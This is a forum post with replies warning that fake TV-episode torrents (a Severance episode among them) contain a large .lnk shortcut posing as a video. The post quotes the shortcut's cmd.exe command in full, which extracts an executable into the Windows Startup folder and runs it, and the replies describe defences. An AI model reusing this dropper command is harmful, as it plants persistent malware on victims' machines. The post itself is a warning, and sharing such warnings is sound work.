I have Sonarr and Radarr set up to keep me up to date on some TV shows. Lately I’ve gotten a handful of files that Sonarr refuses to import because of a .lnk file. The download consists of a folder with the name of the file I want. Inside the folder is a file with the same name, and a .lnk extension. The .lnk file is very big (950Mb), and programmed to run this script:
%ComSpec% /v:On/CSET el=Severance.S02E07.1080p.WEB.H264-SuccessfulCrab.mkv&SET c=“%Appdata%\microsoft\windows\START MENU\PROGRAMS\STARTUP%Username%.exe”&(If not exist !c! Findstr/v “cmd.EXE Rj%TIME:7,1%%TIME:-2%” !el!.Lnk>!c!&Start “” !c!)&CD %tmp%&Echo.>!
As far as I can tell, this creates an empty executable file in your Windows startup folder, and copies a portion of the fake video file into it. It then runs the malware. And, since it’s in your startup folder, it will run again every time you reboot.
The tracker is theRARBG, but it could also come from elsewhere. I’ve found it on a couple of different shows (not just this one), and they always download a couple of days before the airdate.
Be careful!
You must log in or # to comment.
See these all the time, unfortunately. I just add a line in the torrent client to not download anything with that file extension.
I luckily haven’t encountered these yet, but I primarily use NZB
I’ve been noticing these around. Sonar catches them and I just delete them and research. I found that it’s often for the next weeks episode of a show. Only days after the previous episode came out. So it’s easy to see something that looks suspect anyway.
If there is one that is smaller than 950MB, it would be interesting if you uploaded it to a cloud sandbox analyzer like Any.Run, Triage, or some other similar service.
Thank you for the heads up!
laughs in linux
